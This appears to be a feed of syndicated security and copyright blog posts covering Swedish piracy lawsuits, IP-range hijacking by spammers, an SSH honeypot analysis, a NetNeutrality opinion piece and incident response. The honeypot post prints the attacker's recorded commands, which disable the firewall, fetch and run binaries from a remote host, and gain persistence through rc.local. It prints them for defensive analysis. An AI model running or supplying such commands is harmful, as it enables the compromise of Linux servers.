Most countries have managed to avoid the attentions of these outfits, Sweden, the spiritual home of The Pirate Bay, included. However, in a surprise move the Scandinavian country has now appeared on the file-sharing lawsuit radar.

Along with Universal Pictures and Studio Canal, Check Entertainment is one of the companies behind the 2014 Liam Neeson movie, Non-Stop. According to latest figures from Box Office Mojo it has done very well, bringing in excess of $222 million on a $50 million budget.

Nevertheless, according to Dagens Media, Check Entertainment has hired lawfirm Nordic Law to go to court in Sweden to obtain the identities of individuals said to have downloaded and shared the action thriller.

The U.S.-based company has targeted subscribers of five local Internet service providers – Com Hem, Bredbandsbolaget, Banhof, Telia Sonera and Telenor – with the aim of forcing them to turn over the names and addresses of 12 of their Internet subscribers. Data on the alleged file-sharers was captured by German anti-piracy outfit Excipio.

At this point Check Entertainment says it wants to “investigate and prosecute” the subscribers for alleged copyright infringement but if cases in the rest of the world are any yardstick the aim will be a cash settlement, not a full court case.

Interestingly, one ISP from the five has indicated that its customers do not have to be concerned about possible lawsuits or shakedowns.

Service provider Banhof, a company long associated with subscriber privacy, says it is currently the only ISP in the Swedish market that does not store data on its customers’ Internet activities.

The development dates back to April when the EU Court of Justice declared the Data Retention Directive to be invalid. In response, many Swedish ISPs stopped storing data but since then most have reversed their decision to comply with apparent obligations under the Swedish Electronic Communications Act. Banhof did not, however.

This means that even if the ISP is ordered by the court to reveal which subscribers were behind a particular IP address at a certain time, it has no data so simply cannot comply.

“We have no such data. We turned off data storage on the same day that the EU judgment was handed down,” Banhof CEO Jon Karlung told Dagens Media.

While Sweden has a long tradition of file-sharing and the state regularly prosecutes large scale file-sharers, actions against regular sharers of a single title are extremely rare, ‘trolling’ even more so.

“It’s pretty rare,” Karlung says. “It has been quite a long time since it happened last.”

The big question now is whether the courts will be sympathetic to Check Entertainment’s complaint.

“We have submitted [our case] to the district court and now we want to see what the service providers say in response,” Nordic Law’s Patrick Andersson concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Network Hijackers Exploit Technical Loophole

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Spammers have been working methodically to hijack large chunks of Internet real estate by exploiting a technical and bureaucratic loophole in the way that various regions of the globe keep track of the world’s Internet address ranges.

Last week, KrebsOnSecurity featured an in-depth piece about a well-known junk email artist who acknowledged sending from two Bulgarian hosting providers. These two providers had commandeered tens of thousands of Internet addresses from ISPs around the globe, including Brazil, China, India, Japan, Mexico, South Africa, Taiwan and Vietnam.

For example, a closer look at the Internet addresses hijacked by one of the Bulgarian providers — aptly named “Mega-Spred,” with an email contact of “abuse@grimhosting” — shows that this provider has been slowly gobbling up far-flung IP address ranges since late August 2014.

This table, with data from the RIPE NCC, one of the regional Internet Registries, shows IP address hijacking activity by Bulgarian host Mega-Spred.


According to several security and anti-spam experts who’ve been following this activity, Mega-Spred and the other hosting provider in question (known as Kandi EOOD) have been taking advantage of an administrative weakness in the way that some countries and regions of the world keep tabs on the IP address ranges assigned to various hosting providers and ISPs.

IP address hijacking is hardly a new phenomenon. Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker.

Experts say the hijackers also are exploiting a fundamental problem with record-keeping activities of RIPE NCC, the regional Internet registry (RIR) that oversees the allocation and registration of IP addresses for Europe, the Middle East and parts of Central Asia. RIPE is one of several RIRs, including ARIN (which handles mostly North American IP space) and APNIC (Asia Pacific), LACNIC (Latin America) and AFRINIC (Africa).

Ron Guilmette, an anti-spam crusader who is active in numerous Internet governance communities, said the problem is that a network owner in RIPE’s region can hijack Internet addresses that belong to network owners in regions managed by other RIRs, and if the hijackers then claim to RIPE that they’re the rightful owners of those hijacked IP ranges, RIPE will simply accept that claim without verifying or authenticating it.

Worse yet, Guilmette and others say, those bogus entries — once accepted by RIPE — get exported to other databases that are used to check the validity of global IP address routing tables, meaning that parties all over the Internet who are checking the validity of a route may be doing so against bogus information created by the hijacker himself.

“RIPE is now acutely aware of what is going on, and what has been going on, with the blatantly crooked activities of this rogue provider,” Guilmette said. “However, due to the exceptionally clever way that the proprietors of Mega-Spred have performed their hijacks, the people at RIPE still can’t even agree on how to even undo this mess, let alone how to prevent it from happening again in the future.”

And here is where the story perhaps unavoidably warps into Geek Factor 5. For its part, RIPE said in an emailed statement to KrebsOnSecurity that “the RIPE NCC has no knowledge of the agreements made between network operators or with address space holders”:

“It’s important to note the distinction between an Internet Number Registry (INR) and an Internet Routing Registry (IRR). The RIPE Database (and many of the other RIR databases) combine these separate functionalities. An INR records who holds which Internet number resources, and the sub-allocations and assignments they have made to End Users.

On the other hand, an IRR contains route and other objects — which detail a network’s policies regarding who it will peer with, along with the Internet number resources reachable through a specific ASN/network. There are 34 separate IRRs globally — therefore, this isn’t something that happens at the RIR level, but rather at the Internet Routing Registry level.”

“It is not possible therefore for the RIRs to verify the routing information entered into Internet Routing Registries or monitor the accuracy of the route objects,” the organization concluded.

Guilmette said RIPE’s response seems crafted to draw attention away from RIPE’s central role in this mess.

“It is somewhat disingenuous, I think, for this RIPE representative to wave this whole mess off as a problem with the IRRs when, in this specific case, the IRR that first accepted and then promulgated these bogus routing validation records was RIPE,” he said.

RIPE notes that network owners can help reduce the occurrence of IP address hijacking by taking advantage of Resource Certification (RPKI), a free service to RIPE members and non-members that allows network operators to request a digital certificate listing the Internet number resources they hold. This allows other network operators to verify that routing information contained in this system is published by the legitimate holder of the resources. In addition, the system enables the holder to receive notifications when a routing prefix is hijacked, RIPE said.
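To make the RPKI idea concrete, here is a simplified, hypothetical sketch of route-origin validation. Real RPKI relies on X.509 certificates and cryptographically signed ROAs (Route Origin Authorizations); this toy models only the final matching step, and the prefixes and AS numbers are made-up documentation values.

```python
# Toy route-origin validation: given a table of ROAs, classify a BGP
# announcement as "valid" (origin AS authorized), "invalid" (covered by
# a ROA but origin or prefix length doesn't match -- hijack-like), or
# "unknown" (no ROA covers the prefix at all).
import ipaddress

# Hypothetical ROA table: (authorized prefix, max prefix length, origin ASN)
roas = [
    (ipaddress.ip_network("192.0.2.0/24"), 24, 64500),
    (ipaddress.ip_network("198.51.100.0/22"), 24, 64501),
]

def validate(prefix: str, origin_asn: int) -> str:
    """Classify an announcement against the ROA table."""
    net = ipaddress.ip_network(prefix)
    covered = False
    for roa_net, max_len, asn in roas:
        if net.subnet_of(roa_net):
            covered = True  # some ROA speaks for this address space
            if net.prefixlen <= max_len and asn == origin_asn:
                return "valid"
    return "invalid" if covered else "unknown"

print(validate("192.0.2.0/24", 64500))    # valid
print(validate("192.0.2.0/24", 64666))    # invalid: wrong origin AS
print(validate("203.0.113.0/24", 64500))  # unknown: no ROA published
```

An announcement for covered space from the wrong origin comes back "invalid", which is exactly the signal that lets other networks refuse a Mega-Spred-style hijack.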

While RPKI (and other solutions to this problem, such as DNSSEC) have been around for years, obviously not all network providers currently deploy these security methods. Erik Bais, a director at A2B Internet BV — a Dutch ISP — said while broader adoption of solutions like RPKI would certainly help in the long run, one short-term fix is for RIPE to block its Internet providers from claiming routes in address ranges managed by other RIRs.

“This is a quick fix, but it will break things in the future for legitimate usage,” Bais said.

According to RIPE, this very issue was discussed at length at the recent RIPE 69 Meeting in London last week.

“The RIPE NCC is now working with the RIPE community to investigate ways of making such improvements,” RIPE said in a statement.

This is a complex problem to be sure, but I think this story is a great reminder of two qualities about Internet security in general that are fairly static (for better or worse): First, much of the Internet works thanks to the efforts of a relatively small group of people who work very hard to balance openness and ease-of-use with security and stability concerns. Second, global Internet address routing issues are extraordinarily complex — not just in technical terms but also because they also require coordination and consensus between and among multiple stakeholders with sometimes radically different geographic and cultural perspectives. Unfortunately, complexity is the enemy of security, and spammers and other ne’er-do-wells understand and exploit this gap as often as possible.

SANS Internet Storm Center, InfoCON: green: Lessons Learn from attacks on Kippo honeypots, (Mon, Nov 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of my fellow Handlers have discussed Kippo [1], an SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is predictably random: a mixture of known bad IP ranges, researchers, scanning and probing from behind Tor, and would-be attackers manually entering commands from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day. Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different, the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippo’s fake system.

“So what?” you may ask. I like to draw lessons learnt from this type of honeypot interaction, which help provide some tactical and operational intelligence that can be passed to other teams to use. Don’t limit this type of information gathering to just the security teams; for example, our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks to keep their checks current and well advised. A single-line note on a daily report to the stakeholders for security may be in order, for awareness, if your organisation is running internet-facing Linux systems with SSH on TCP port 22.

Here are some of the ones I detailed that would be passed to the security team.

1) The password 12345 isn’t very safe. Who knew? (implied sarcasm)
2) The adversary was a scripted session with no error checking (see the script’s actions below)
3) The roughly two hours of attacks from each unique IP address show a lack of centralised command and control
4) The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this is most likely a relatively new set of scans and attacks
5) The target of the attack is to compromise Linux systems
6) The adversary’s file hosting locations are Windows systems based in China running HFS v2.3c 291 [4], a free Windows web server, on port 8889, which has a known remote command execution flaw the owners should probably look at patching
7) Running static or dynamic analysis of the captured Linux binaries provides a wealth of further indicators
8) The IP addresses of the scanning and host servers
9) And a nice list of usernames and passwords to be added to the “never, ever use these for anything” list (root/root, root/password, admin/admin, etc.)
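Point 9 above suggests one concrete control: rejecting credentials that appear on a deny-list built from honeypot captures. A minimal illustrative sketch (the pairs shown are examples from the list above, not a complete feed):

```python
# Check a username/password pair against a deny-list of credentials
# observed in honeypot brute-force attacks. In practice the set would
# be refreshed from honeypot logs rather than hard-coded.

DENY_LIST = {
    ("root", "root"),
    ("root", "password"),
    ("root", "12345"),
    ("admin", "admin"),
}

def credentials_allowed(username: str, password: str) -> bool:
    """Return False for pairs seen in brute-force attacks."""
    return (username.lower(), password) not in DENY_LIST

print(credentials_allowed("admin", "admin"))   # False
print(credentials_allowed("alice", "a-long-unique-passphrase"))  # True
```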

I’d normally offer up any captured binaries for further analysis, if the teams had the capacity to do this, or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard-coded commands, IP addresses, domain names, etc.).

If you have any other comments on how to make honeypot collections relevant, please drop me a line!

Recorded commands by Kippo:
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./badfile1
cd /tmp
/tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./badfile2
bash: ./badfile2: command not found
/tmp# cd /tmp
/tmp# echo cd /root >> /etc/rc.local
/tmp# echo ./badfile1 >> /etc/rc.local
/tmp# echo ./badfile2 >> /etc/rc.local
/tmp# echo /etc/init.d/iptables stop >> /etc/rc.local

[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.

[2] File hash 1 0601aa569d59175733db947f17919bb7
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: This Vox NetNeutrality article is wrong

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

There is no reasoned debate over NetNeutrality because the press is so biased. An example is this article by Timothy B. Lee at Vox “explaining” NetNeutrality. It doesn’t explain, it advocates.

1. Fast Lanes

Fast-lanes have been an integral part of the Internet since the beginning. Whenever somebody was unhappy with their speeds, they paid money to fix the problem. Most importantly, Facebook pays for fast-lanes, contrary to the example provided.

One prominent example of fast-lanes is “channels” in the local ISP network to avoid congestion. These allow the ISP to provide VoIP and streaming video over its own private TCP/IP network that won’t be impacted by the congestion that everything else experiences. That’s why during prime-time (7pm to 10pm), your NetFlix streams are low-def (to reduce bandwidth), while your cable TV video-on-demand is hi-def.

Historically, these channels were all “MPEG-TS”, transport streams based on the MPEG video standard. Even your Internet packets would be contained inside the MPEG streams on channels.

Today, the situation is usually reversed. New fiber-optic services run TCP/IP networks everywhere, putting MPEG streams on top of TCP/IP. They just separate the channels into their private TCP/IP network that doesn’t suffer congestion (for voice and video-on-demand), and the public Internet access that does. Their services don’t suffer congestion; other people’s services do.

The more important fast-lanes are known as “content delivery networks” or “CDNs”. These companies pay ISPs to co-locate servers on their network, putting servers in every major city. Companies like Facebook then pay the CDNs to host their data.

If you monitor your traffic, you’ll see that the vast majority goes to CDNs located in your city. When you access different, often competing companies like Facebook and Apple, your traffic may in fact go to the same IP address of the CDN server.

Smaller companies that cannot afford CDNs must host their content in just a couple of locations. Since these locations are thousands of miles from most of their customers, access is slower than for CDN-hosted content like Facebook’s. Pay-for-play, with preferred and faster access, has been an integral part of the Internet since the very beginning.

This demonstrates that the Vox example of Facebook is a complete lie. Their worst-case scenario already exists, and has existed since before the dot-com era even started, and has enabled competition and innovation rather than hindering it.

2. Innovation

Vox claims: “Advocates say the neutrality of the internet is a big reason there has been so much online innovation over the last two decades.”

No, it’s opponents who claim the lack of government regulation is the reason there has been so much online innovation in the last decades.

NetNeutrality means sweeping government regulation that forces companies to ask permission before innovating. NetNeutrality means spending money lobbying the government for special rules, surviving or failing based on the success of paying off politicians rather than on their own merits.

Take GoGo Inflight broadband Internet service on airplanes. They block NetFlix in favor of their own video streaming service. This is exactly the sort of thing that NetNeutrality regulations are supposed to block. However, it’s technically necessary. A single person streaming video from NetFlix would overload the connection for everyone else. To satisfy video customers, GoGo puts servers on the plane for its streaming service — allowing streaming without using the Internet connection to the ground.

If NetNeutrality became law, such things would be banned. But of course, since that would kill Internet service on airplanes, the FCC would immediately create rules to allow this. But then everyone would start lobbying the FCC for their own exceptions. In the end, you’d have the same thing with every other highly regulated industry, where companies with the most lobbying dollars win.

Innovation happens because companies innovate first and ask for permission (or forgiveness) later. A few years ago, Comcast throttled BitTorrent traffic during prime time. NetNeutrality proponents think this is bad, and use it as an example of why we need regulation. But no matter how bad it is, it’s a healthy sign of innovation. Not all innovations are good, sometimes companies will try things, realize they are bad, then stop doing them. Under NetNeutrality regulations, nothing bad will happen ever again, because government regulators won’t allow it. But that also means good innovations won’t happen either — companies won’t be able to freely try them out without regulators putting a stop to it.

Right now, you can start a company like Facebook without spending any money lobbying the government. In the NetNeutrality future, that will no longer be possible. A significant amount of investor money will go toward lobbying the government for favorable regulation, to ask permission.

3. What’s Taking So Long

Vox imagines that NetNeutrality is such a good idea that the only thing stopping it is technicalities.

The opposite is true. The thing stopping NetNeutrality is that it’s a horrible idea that kills innovation. It’s not a technical idea, but a political one. It’s pure left-wing politics that demands the government run everything. The thing stopping it is right-wing politics that wants the free-market to run things.

The refusal of Vox to recognize that this is a left-wing vs. right-wing debate demonstrates their overwhelming political bias on this issue.

4. FCC Bypassing Congress

The Internet is new and different. If regulating it like a utility is a good idea, then it’s Congress who should pass a law to do this.

What Obama wants to do is bypass congress and seize control of the Internet himself.

5. Opponent’s arguments

Vox gets this partly right, but fundamentally wrong.

The fundamental argument by opponents is that nothing bad is happening now. None of the evil scenarios of what might happen are actually happening now.

Sure, sometimes companies do bad things, but the market immediately corrects. That’s the consequence of permission-free innovation: innovate first, and ask for permission (or forgiveness) later. That sometimes companies have to ask for forgiveness is a good sign.

Let’s wait until Comcast actually permanently blocks content, or charges NetFlix more than other CDNs, or any of the other hypothetical evils, then let’s start talking about the government taking control.

6. Red Tape

Strangling with red-tape isn’t a binary proposition.

What red-tape means is that network access becomes politicized, as only those with the right political connections get to act. What red-tape means is that only huge corporations can afford the cost. If you like a world dominated by big, connected corporations, then you want NetNeutrality regulations.

While it won’t strangle innovation, it’ll drastically slow it down.

7. YouTube

Vox claims that startups like YouTube would have difficulty getting off the ground with NetNeutrality regulation. The opposite is true: companies like YouTube would no longer be able to get off the ground without lobbying the government for permission.

8. Level Playing Field

Vox’s description of the NetFlix-Comcast situation is completely biased and wrong, taking NetFlix’s and the left’s description at face value. It’s not true.

Descriptions of the NetFlix-Comcast issue completely ignore the technical details, but the technical details matter. For one thing, it doesn’t stream “across the Internet”. The long-distance links between cities cannot support that level of traffic. Instead, NetFlix puts servers in every major city to stream from. These servers are often co-located in the same building as Comcast’s major peering points.

In other words, what we are often talking about is how to get video streaming from NetFlix servers from one end of a building to another.

During prime time (7pm to 10pm), NetFlix’s bandwidth requirements are many times greater than all non-video traffic put together. That essentially means that companies like Comcast have to specially engineer their networks just to handle NetFlix. So far, NetFlix has been exploiting loopholes in “peering agreements” designed for non-video traffic in order to get a free ride.

Re-architecting the Internet to make NetFlix work requires a lot of money. Right now, those costs are borne by all Comcast subscribers — even those who don’t watch NetFlix. The 90% of customers with low-bandwidth needs are subsidizing the 10% who watch NetFlix at prime time. We like to think of Comcast as having monopolistic power, but it doesn’t. The truth is that Comcast has very little power in pricing. It can’t meter traffic, charging those who abuse the network during prime time to account for their costs. Thus, instead of charging NetFlix abusers directly, it just passes its costs to NetFlix.

Converting the Internet into a public-utility wouldn’t change this. It simply means that instead of fighting in the market place, the Comcast-NetFlix battle would be decided by regulators. And, the result of the decision would be whichever company did the best job lobbying the FCC and paying off politicians — which would probably be Comcast.

Schneier on Security: The Future of Incident Response

This post was syndicated from: Schneier on Security and was written by: moderator. Original post: at Schneier on Security

Security is a combination of protection, detection, and response. It’s taken the industry a long time to get to this point, though. The 1990s was the era of protection. Our industry was full of products that would protect your computers and network. By 2000, we realized that detection needed to be formalized as well, and the industry was full of detection products and services.

This decade is one of response. Over the past few years, we’ve started seeing incident response (IR) products and services. Security teams are incorporating them into their arsenal because of three trends in computing. One, we’ve lost control of our computing environment. More of our data is held in the cloud by other companies, and more of our actual networks are outsourced. This makes response more complicated, because we might not have visibility into parts of our critical network infrastructures.

Two, attacks are getting more sophisticated. The rise of APT (advanced persistent threat)–attacks that specifically target their victims for reasons other than simple financial theft–brings with it a new sort of attacker, which requires a new threat model. Also, as hacking becomes a more integral part of geopolitics, unrelated networks are increasingly collateral damage in nation-state fights.

And three, companies continue to under-invest in protection and detection, both of which are imperfect even under the best of circumstances, obliging response to pick up the slack.

Way back in the 1990s, I used to say that “security is a process, not a product.” That was a strategic statement about the fallacy of thinking you could ever be done with security; you need to continually reassess your security posture in the face of an ever-changing threat landscape.

At a tactical level, security is both a product and a process. Really, it’s a combination of people, process, and technology. What changes are the ratios. Protection systems are almost entirely technology, with some assistance from people and process. Detection requires more-or-less equal proportions of people, process, and technology. Response is mostly done by people, with critical assistance from process and technology.

Usability guru Lorrie Faith Cranor once wrote, “Whenever possible, secure system designers should find ways of keeping humans out of the loop.” That’s sage advice, but you can’t automate IR. Everyone’s network is different. All attacks are different. Everyone’s security environments are different. The regulatory environments are different. All organizations are different, and political and economic considerations are often more important than technical considerations. IR needs people, because successful IR requires thinking.

This is new for the security industry, and it means that response products and services will look different. For most of its life, the security industry has been plagued with the problems of a lemons market. That’s a term from economics that refers to a market where buyers can’t tell the difference between good products and bad. In these markets, mediocre products drive good ones out of the market; price is the driver, because there’s no good way to test for quality. It’s been true in anti-virus, it’s been true in firewalls, it’s been true in IDSs, and it’s been true elsewhere. But because IR is people-focused in ways protection and detection are not, it won’t be true here. Better products will do better because buyers will quickly be able to determine that they’re better.

The key to successful IR is found in Cranor’s next sentence: “However, there are some tasks for which feasible, or cost effective, alternatives to humans are not available. In these cases, system designers should engineer their systems to support the humans in the loop, and maximize their chances of performing their security-critical functions successfully.” What we need is technology that aids people, not technology that supplants them.

The best way I’ve found to think about this is OODA loops. OODA stands for “observe, orient, decide, act,” and it’s a way of thinking about real-time adversarial situations developed by US Air Force military strategist John Boyd. He was thinking about fighter jets, but the general idea has been applied to everything from contract negotiations to boxing–and computer and network IR.

Speed is essential. People in these situations are constantly going through OODA loops in their head. And if you can do yours faster than the other guy–if you can “get inside his OODA loop”–then you have an enormous advantage.

We need tools to facilitate all of these steps:

  • Observe, which means knowing what’s happening on our networks in real time. This includes real-time threat detection information from IDSs, log monitoring and analysis data, network and system performance data, standard network management data, and even physical security information–and then knowing which tools to use to synthesize and present it in useful formats. Incidents aren’t standardized; they’re all different. The more an IR team can observe what’s happening on the network, the more they can understand the attack. This means that an IR team needs to be able to operate across the entire organization.
  • Orient, which means understanding what it means in context, both in the context of the organization and the context of the greater Internet community. It’s not enough to know about the attack; IR teams need to know what it means. Is there a new malware being used by cybercriminals? Is the organization rolling out a new software package or planning layoffs? Has the organization seen attacks from this particular IP address before? Has the network been opened to a new strategic partner? Answering these questions means tying data from the network to information from the news, network intelligence feeds, and other information from the organization. What’s going on in an organization often matters more in IR than the attack’s technical details.
  • Decide, which means figuring out what to do at that moment. This is actually difficult because it involves knowing who has the authority to decide and giving them the information to decide quickly. IR decisions often involve executive input, so it’s important to be able to get those people the information they need quickly and efficiently. All decisions need to be defensible after the fact and documented. Both the regulatory and litigation environments have gotten very complex, and decisions need to be made with defensibility in mind.
  • Act, which means being able to make changes quickly and effectively on our networks. IR teams need access to the organization’s network–all of the organization’s network. Again, incidents differ, and it’s impossible to know in advance what sort of access an IR team will need. But ultimately, they need broad access; security will come from audit rather than access control. And they need to train repeatedly, because nothing improves someone’s ability to act more than practice.
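
The four steps above can be sketched as a single pluggable cycle. This is only an illustrative skeleton — the stage functions and the toy "known bad" data are invented — but it shows where tooling feeds each human-driven stage:

```python
def ooda_cycle(observe, orient, decide, act):
    """One pass of observe -> orient -> decide -> act. Each stage is a
    callable; in real incident response most of them are people, and
    the tooling's job is to feed them data quickly."""
    events = observe()          # raw telemetry: IDS alerts, logs, netflow
    context = orient(events)    # enrich with org + threat-intel context
    decision = decide(context)  # the accountable human picks an action
    return act(decision)        # apply it on the network, and document it

# Toy run: flag an alert from an address we've seen attack us before.
known_bad = {"203.0.113.9"}
result = ooda_cycle(
    observe=lambda: [{"src": "203.0.113.9", "type": "login-failure"}],
    orient=lambda ev: [e for e in ev if e["src"] in known_bad],
    decide=lambda ctx: {"block": [e["src"] for e in ctx]},
    act=lambda d: d,
)
print(result)  # {'block': ['203.0.113.9']}
```

The point of the shape is that each stage is replaceable: swap the lambdas for real feeds, analysts, and change-management hooks without altering the loop.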

Pulling all of these tools together under a unified framework will make IR work. And making IR work is the ultimate key to making security work. The goal here is to bring people, process, and technology together in a way we haven’t seen before in network security. It’s something we need to do to continue to defend against the threats.

This essay originally appeared in IEEE Security & Privacy.

Krebs on Security: Still Spamming After All These Years

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A long trail of spam, dodgy domains and hijacked Internet addresses leads back to a 37-year-old junk email purveyor in San Diego who was the first alleged spammer to have been criminally prosecuted 13 years ago for blasting unsolicited commercial email.

Last month, security experts at Cisco blogged about spam samples caught by the company’s SpamCop service, which maintains a blacklist of known spam sources. When companies or Internet service providers learn that their address ranges are listed on spam blacklists, they generally get in touch with the blacklister to determine and remediate the cause for the listing (because usually at that point legitimate customers of the blacklisted company or ISP are having trouble sending email).

In this case, a hosting firm in Ireland reached out to Cisco to dispute being listed by SpamCop, insisting that it had no spammers on its networks. Upon investigating further, the hosting company discovered that the spam had indeed come from its Internet addresses, but that the addresses in question weren’t actually being hosted on its network. Rather, the addresses had been hijacked by a spam gang.

Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker (for another example of IP address hijacking, also known as “network identity theft,” check out this story I wrote for The Washington Post back in 2008).

So who’s benefitting from the Internet addresses wrested from the Irish hosting company? According to Cisco, the addresses were hijacked by Mega-Spred and Visnet, hosting providers in Bulgaria and Romania, respectively. But what of the spammers using this infrastructure?

One of the domains promoted in the spam that caused this ruckus — unmetegulzoo[dot]com — leads to some interesting clues. It was registered recently by a Mike Prescott in San Diego, and the registrant’s email address was used to register more than 1,100 similarly spammy domains that were recently seen in junk email campaigns (for the complete list, see the accompanying CSV file).

Enter Ron Guilmette, an avid anti-spam researcher who tracks spammer activity not by following clues in the junk email itself but by looking for patterns in the way spammers use the domains they’re advertising in their spam campaigns. Guilmette stumbled on the domains registered to the Mike Prescott address while digging through the registration records on more than 14,000 spam-advertised domains that were all using the same method (Guilmette asked to keep that telltale pattern out of this story so as not to tip off the spammers, but I have seen his research and it is solid).

Of the 5,000 or so domains in that bunch that have accessible WHOIS registration records, hundreds were registered to variations on the Mike Prescott email address and to locations in San Diego. Interestingly, one email address found in the registration records for hundreds of domains advertised in this spam campaign also happens to be tied to the Facebook account of one Michael Persaud in San Diego.
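
The kind of registrant clustering described here can be approximated by normalizing away trivial email variations — including Gmail’s dot-insensitivity — before grouping domains. A rough sketch with invented records (real WHOIS data is far messier, and the addresses below are hypothetical):

```python
from collections import defaultdict

def normalize_email(addr):
    """Collapse trivial variations: lowercase everything, and for
    Gmail-style providers drop dots and '+tag' suffixes in the
    local part, since they all deliver to the same inbox."""
    local, _, domain = addr.lower().partition("@")
    if domain in ("gmail.com", "googlemail.com"):
        local = local.split("+", 1)[0].replace(".", "")
    return f"{local}@{domain}"

def cluster_by_registrant(whois_records):
    """Group registered domains by normalized registrant email."""
    clusters = defaultdict(set)
    for domain, email in whois_records:
        clusters[normalize_email(email)].add(domain)
    return clusters

# Hypothetical records: three superficially different addresses.
records = [
    ("spammy-one.example", "j.doe@gmail.com"),
    ("spammy-two.example", "J.D.oe@gmail.com"),
    ("spammy-three.example", "jdoe+offers@gmail.com"),
]
clusters = cluster_by_registrant(records)
print(len(clusters))  # 1 -- all three domains share one registrant
```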

Persaud is an unabashed bulk emailer who’s been sued by AOL, the San Diego District Attorney’s office and by anti-spam activists multiple times over the last 15 years. Reached via email, Persaud doesn’t deny registering the domains in question, and admits to sending unsolicited bulk email for a variety of “clients.” But Persaud claims that all of his spam campaigns adhere to the CAN-SPAM Act, the main anti-spam law in the United States — which prohibits the sending of spam that spoofs the sender’s address and which does not give recipients an easy way to opt out of receiving future such emails from that sender.

As for why his spam was observed coming from multiple hijacked Internet address ranges, Persaud said he had no idea.

“I can tell you that my company deals with many different ISPs both in the US and overseas and I have seen a few instances where smaller ones will sell space that ends up being hijacked,” Persaud wrote in an email exchange with KrebsOnSecurity. “When purchasing IP space you assume it’s the ISP’s to sell and don’t really think that they are doing anything illegal to obtain it. If we find out IP space has been hijacked we will refuse to use it and demand a refund. As for this email address being listed with domain registrations, it is done so with accordance with the CAN-SPAM guidelines so that recipients may contact us to opt-out of any advertisements they receive.”

Guilmette says he’s not buying Persaud’s explanation of events.

“He’s trying to make it sound as if IP address hijacking is a very routine sort of thing, but it is still really quite rare,” Guilmette said.

The anti-spam crusader says the mere fact that Persaud has admitted that he deals with many different ISPs both in the US and overseas is itself telling, and typical of so-called “snowshoe” spammers — junk email purveyors who try to avoid spam filters and blacklists by spreading their spam-sending systems across a broad swath of domains and Internet addresses.

“The vast majority of all legitimate small businesses ordinarily just find one ISP that they are comfortable with — one that provides them with decent service at a reasonable price — and then they just use that” to send email, Guilmette said. “Snowshoe spammers who need lots of widely dispersed IP space do often obtain that space from as many different ISPs, in the US and elsewhere, as they can.”

Persaud declined to say which companies or individuals had hired him to send email, but cached copies of some of the domains flagged by Cisco show the types of businesses you might expect to see advertised in junk email: payday loans, debt consolidation services, and various nutraceutical products.

In 1998, Persaud was sued by AOL, which charged that he committed fraud by using various names to send millions of get-rich-quick spam messages to America Online customers. In 2001, the San Diego District Attorney’s office filed criminal charges against Persaud, alleging that he and an accomplice crashed a company’s email server after routing their spam through the company’s servers. In 2000, Persaud admitted to one felony count (PDF) of stealing from the U.S. government, after being prosecuted for fraud related to some asbestos removal work that he did for the U.S. Navy.

Many network operators remain unaware of the threat of network address hijacking, but as Cisco notes, network administrators aren’t completely helpless in the fight against network-hijacking spammers: Resource Public Key Infrastructure (RPKI) can be leveraged to prevent this type of activity. Another approach known as DNSSEC can also help.
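
The RPKI defense mentioned above boils down to checking a BGP announcement against published Route Origin Authorizations (ROAs), which bind a prefix to its authorized origin AS. A minimal sketch of that origin-validation logic — the ROA table, prefixes, and AS numbers here are invented; real validators work from the signed RPKI repositories:

```python
import ipaddress

# A Route Origin Authorization: (prefix, authorized origin ASN, max length)
ROAS = [
    (ipaddress.ip_network("192.0.2.0/24"), 64500, 24),
]

def validate(prefix, origin_asn):
    """Classify a BGP announcement against the ROA table:
    'valid', 'invalid', or 'unknown' (no covering ROA)."""
    net = ipaddress.ip_network(prefix)
    covered = False
    for roa_net, asn, max_len in ROAS:
        if net.subnet_of(roa_net):
            covered = True
            if origin_asn == asn and net.prefixlen <= max_len:
                return "valid"
    return "invalid" if covered else "unknown"

print(validate("192.0.2.0/24", 64500))  # valid   -- legitimate holder
print(validate("192.0.2.0/24", 64999))  # invalid -- hijacker's origin AS
```

Note the "unknown" outcome: a dormant range with no ROA at all gets no protection, which is exactly why unannounced address space is so attractive to hijackers.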

SANS Internet Storm Center, InfoCON: green: Whois someone else?, (Tue, Nov 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A couple of weeks ago, I already covered the situation where a cloud IP address gets re-assigned, and the new owner still sees some of your traffic. Recently, one of our clients had the opposite problem: They had changed their Internet provider, and had held on to the old address range for a decent decay time. They even confirmed with a week-long packet capture that there was no afterglow on the link, and then dismantled the setup.

